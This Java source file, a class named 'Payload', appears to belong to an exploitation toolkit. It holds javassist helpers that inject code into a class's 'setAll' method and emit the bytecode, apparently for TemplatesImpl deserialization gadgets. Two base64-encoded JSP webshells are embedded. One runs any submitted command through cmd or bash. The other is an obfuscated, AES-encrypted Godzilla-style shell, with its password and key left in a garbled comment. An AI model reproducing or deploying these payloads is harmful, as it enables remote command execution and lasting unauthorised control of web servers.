package sonomon;

import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;

public class Payload {
	
	
	  public static byte[] getTemplatesImplClassBytes(String classname, String setALLString) throws Exception {
          ClassPool classPool = ClassPool.getDefault();
          CtClass ctClass = classPool.get(classname);
          if(ctClass.isFrozen()){
          	ctClass.defrost();
          }
          try {
        	  CtMethod method = ctClass.getDeclaredMethod("setAll");
              method.setBody(setALLString);
          } catch (Exception e) {
        	  e.printStackTrace();
          }
          ctClass.getClassFile().setMajorVersion(50);
          return ctClass.toBytecode();
	  }
	
	  public static byte[] getClassBytes(String classname, String setALLString) throws Exception {
          ClassPool classPool = ClassPool.getDefault();
          CtClass ctClass = classPool.get(classname);
          if(ctClass.isFrozen()){
        	  ctClass.defrost();
          }
          try {
              CtMethod method = ctClass.getDeclaredMethod("setAll");
              method.setBody(setALLString);
		} catch (Exception e) {
		}
          ctClass.getClassFile().setMajorVersion(50);
          return ctClass.toBytecode();
	  }

	  public static String getcmdjsp(){
		  return "PCVAIHBhZ2UgcGFnZUVuY29kaW5nPSJ1dGYtOCIlPgo8JUAgcGFnZSBpbXBvcnQ9ImphdmEudXRpbC5TY2FubmVyIiAlPgo8SFRNTD4KPEJPRFk+CjxIMz5MYW5kR3JleTwvSDM+CjxGT1JNIE1FVEhPRD0iUE9TVCIgTkFNRT0iZm9ybSIgQUNUSU9OPSIjIj4KICAgIDxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJxIj4KICAgIDxJTlBVVCBUWVBFPSJzdWJtaXQiIFZBTFVFPSJGbHkiPgo8L0ZPUk0+Cgo8JQogICAgU3RyaW5nIG9wPSJHb3QgTm90aGluZyI7CiAgICBTdHJpbmcgcXVlcnkgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigicSIpOwogICAgU3RyaW5nIGZpbGVTZXBhcmF0b3IgPSBTdHJpbmcudmFsdWVPZihqYXZhLmlvLkZpbGUuc2VwYXJhdG9yQ2hhcik7CiAgICBCb29sZWFuIGlzV2luID0gdHJ1ZTsKICAgIGlmKGZpbGVTZXBhcmF0b3IuZXF1YWxzKCJcXCIpKXsKICAgICAgICBpc1dpbiA9IHRydWU7CiAgICB9ZWxzZXsKICAgICAgICBpc1dpbiA9IGZhbHNlOwogICAgfQoKICAgIGlmIChxdWVyeSAhPSBudWxsKSB7CiAgICAgICAgUHJvY2Vzc0J1aWxkZXIgcGI7CiAgICAgICAgaWYoaXNXaW4pIHsKICAgICAgICAgICAgcGIgPSBuZXcgUHJvY2Vzc0J1aWxkZXIobmV3IFN0cmluZyhuZXcgYnl0ZVtdezk5LCAxMDksIDEwMH0pLCBuZXcgU3RyaW5nKG5ldyBieXRlW117NDcsIDY3fSksIHF1ZXJ5KTsKICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgcGIgPSBuZXcgUHJvY2Vzc0J1aWxkZXIobmV3IFN0cmluZyhuZXcgYnl0ZVtdezQ3LCA5OCwgMTA1LCAxMTAsIDQ3LCA5OCwgOTcsIDExNSwgMTA0fSksIG5ldyBTdHJpbmcobmV3IGJ5dGVbXXs0NSwgOTl9KSwgcXVlcnkpOwogICAgICAgIH0KICAgICAgICBQcm9jZXNzIHByb2Nlc3MgPSBwYi5zdGFydCgpOwogICAgICAgIFNjYW5uZXIgc2MgPSBuZXcgU2Nhbm5lcihwcm9jZXNzLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcigiXFxBIik7CiAgICAgICAgb3AgPSBzYy5oYXNOZXh0KCkgPyBzYy5uZXh0KCkgOiBvcDsKICAgICAgICBzYy5jbG9zZSgpOwogICAgfQolPgoKPFBSRT4KICAgIDwlPSBvcCAlPj4KPC9QUkU+CjwvQk9EWT4KPC9IVE1MPg==";
	  }
	  
	  public static String getgodzillajsp(){
		  //√‹¬Î:Tas9er √‹‘ø:B7VO2sAamj
		  return "PCUhIFN0cmluZyBnb3ZzYl9pQ0tJYkZRY29BdSA9ICJkMWIxMGQ3YTAyZjZkMzUxIjsKICAgIFN0cmluZyBnb3ZzYl9tZmg0NUZRcGhoQmFNID0gIlRhczllciI7CiAgICBjbGFzcyBnb3ZzYl90YmJpMW1welVMIGV4dGVuZHMgLyplZHVzYl82dyovQ2xhc3NMb2FkZXIgewogICAgICAgIHB1YmxpYyBnb3ZzYl90YmJpMW1welVMKENsYXNzTG9hZGVyIGdvdnNiXzczN08zMGtGKSB7CiAgICAgICAgICAgIHN1cGVyLyplZHVzYl9PQmkqLyhnb3ZzYl83MzdPMzBrRik7CiAgICAgICAgfQogICAgICAgIHB1YmxpYyBDbGFzcyBnb3ZzYl9uYU05MWFmcyhieXRlW10gZ292c2JfemI3TDdBYXpXKSB7CiAgICAgICAgICAgIHJldHVybiBzdXBlci4vKmVkdXNiXzdBQ3BWKi9cdTAwNjRcdTAwNjVcdTAwNjZcdTAwNjlcdTAwNmVcdTAwNjVcdTAwNDNcdTAwNmNcdTAwNjFcdTAwNzNcdTAwNzMvKmVkdXNiX1o2bmR0Y0phKi8oZ292c2JfemI3TDdBYXpXLCAxMjk1NC0xMjk1NCwgZ292c2JfemI3TDdBYXpXLmxlbmd0aCk7CiAgICAgICAgfQogICAgfQogICAgcHVibGljIGJ5dGVbXSBnb3ZzYl93THN6ajJWNGYoYnl0ZVtdIGdvdnNiX2lBWGF5SDBTMlBRLCBib29sZWFuIGdvdnNiX0dtdjhXSG9EaHRZN3NjRikgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIGpcdTAwNjFcdTAwNzZcdTAwNjFcdTAwNzguLyplZHVzYl9xOFJsbm5RKi9cdTAwNjNcdTAwNzJcdTAwNzlcdTAwNzBcdTAwNzRcdTAwNmYuQ2lwaGVyIGdvdnNiX2x2aTggPSBqXHUwMDYxXHUwMDc2XHUwMDYxXHUwMDc4Llx1MDA2M1x1MDA3Mlx1MDA3OVx1MDA3MFx1MDA3NFx1MDA2Zi5DaXBoZXIuXHUwMDY3XHUwMDY1XHUwMDc0XHUwMDQ5XHUwMDZlXHUwMDczXHUwMDc0XHUwMDYxXHUwMDZlXHUwMDYzZS8qZWR1c2JfU0M1UlIxWEMqLygiQUVTIik7CiAgICAgICAgICAgIGdvdnNiX2x2aTguaW5pdChnb3ZzYl9HbXY4V0hvRGh0WTdzY0Y/MTI5NTQvMTI5NTQ6MTI5NTQvMTI5NTQrMTI5NTQvMTI5NTQsbmV3IGpcdTAwNjFcdTAwNzZcdTAwNjFcdTAwNzguXHUwMDYzXHUwMDcyXHUwMDc5XHUwMDcwXHUwMDc0XHUwMDZmLnNwZWMuLyplZHVzYl9DdnQ5cSovU2VjcmV0S2V5U3BlYy8qZWR1c2JfYjltaGVwSiovKGdvdnNiX2lDS0liRlFjb0F1LmdldEJ5dGVzKCksICJBRVMiKSk7CiAgICAgICAgICAgIHJldHVybiBnb3ZzYl9sdmk4LmRvRmluYWwvKmVkdXNiX3IqLyhnb3ZzYl9pQVhheUgwUzJQUSk7CiAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgcmV0dXJuIG51bGw7CiAgICAgICAgfQogICAgIH0KICAgICU+PCUKICAgIHRyeSB7CiAgICAgICAgYnl0ZVtdIGdvdnNiXzExeGp3Q1BJMG9jaXIgPSBqYXZhLnV0aWwuQmFzZTY0Li8qZWR1c2JfeFJUVlpMS2FRKi9cdTAwNjdcdTAwNjVcdTAwNzRcdTAwNDRcdTAwNjVcdTAwNjNcdTAwNmZcdTAwNjRcdTAwNjVcdTAwNzIoKS4vKmVkdXNiX3haTVN2dHlYbyovZGVjb2RlKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKGdvdnNiX21maDQ1RlFwaGhCYU0pKTsKICAgICAgICBnb3ZzYl8xMXhqd0NQSTBvY2lyID0gZ292c2Jfd0xzemoyVjRmKGdvdnNiXzExeGp3Q1BJMG9jaXIsZmFsc2UpOwogICAgICAgIGlmIChzZXNzaW9uLmdldEF0dHJpYnV0ZS8qZWR1c2JfWktMOGhYSiovKCJwYXlsb2FkIikgPT0gbnVsbCkgewogICAgICAgICAgICBzZXNzaW9uLnNldEF0dHJpYnV0ZSgicGF5bG9hZCIsIG5ldyBnb3ZzYl90YmJpMW1welVMKHRoaXMuXHUwMDY3XHUwMDY1XHUwMDc0XHUwMDQzXHUwMDZjXHUwMDYxXHUwMDczXHUwMDczKCkuLyplZHVzYl9sQU5hQ0R3S2RaciovXHUwMDY3XHUwMDY1XHUwMDc0XHUwMDQzXHUwMDZjXHUwMDYxXHUwMDczXHUwMDczTG9hZGVyKCkpLyplZHVzYl80U2RpUlFFWCovLmdvdnNiX25hTTkxYWZzKGdvdnNiXzExeGp3Q1BJMG9jaXIpKTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICByZXF1ZXN0LnNldEF0dHJpYnV0ZSgicGFyYW1ldGVycyIsIGdvdnNiXzExeGp3Q1BJMG9jaXIpOwogICAgICAgICAgICBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSBnb3ZzYl8xID0gbmV3IGphdmEuaW8uLyplZHVzYl9IWlQqL0J5dGVBcnJheU91dHB1dFN0cmVhbSgpOwogICAgICAgICAgICBPYmplY3QgZ292c2JfRnIgPSAvKmVkdXNiX1FGNEEqLygoQ2xhc3MpIHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLi8qZWR1c2JfVVFYVkkqLy8qZWR1c2JfR245OGptRDJ3ViovbmV3XHUwMDQ5XHUwMDZlXHUwMDczXHUwMDc0XHUwMDYxXHUwMDZlXHUwMDYzXHUwMDY1KCkvKmVkdXNiX2plV2JEKi87CiAgICAgICAgICAgIGdvdnNiX0ZyLmVxdWFscyhnb3ZzYl8xKTsKICAgICAgICAgICAgZ292c2JfRnIuZXF1YWxzKHBhZ2VDb250ZXh0KTsKICAgICAgICAgICAgcmVzcG9uc2UuZ2V0V3JpdGVyKCkud3JpdGUoIjM1M0NBMjMyREQ5MjlDQUI1NzI0NjMyNTUwNUYzQzZGIi5zdWJzdHJpbmcoMTI5NTQtMTI5NTQsIDE2KSk7CiAgICAgICAgICAgIGdvdnNiX0ZyLnRvU3RyaW5nKCk7CiAgICAgICAgICAgIHJlc3BvbnNlLmdldFdyaXRlcigpLndyaXRlKGphdmEudXRpbC5CYXNlNjQvKmVkdXNiX3ljKi8uZ2V0RW5jb2RlcigpLyplZHVzYl9xSFJoKi8uZW5jb2RlVG9TdHJpbmcoZ292c2Jfd0xzemoyVjRmKGdvdnNiXzEudG9CeXRlQXJyYXkoKSx0cnVlKSkpOwogICAgICAgICAgICByZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZSgiMzUzQ0EyMzJERDkyOUNBQjU3MjQ2MzI1NTA1RjNDNkYiLnN1YnN0cmluZygxNikpOwogICAgICAgIH0KICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICB9CiU+";
	  }
	
}
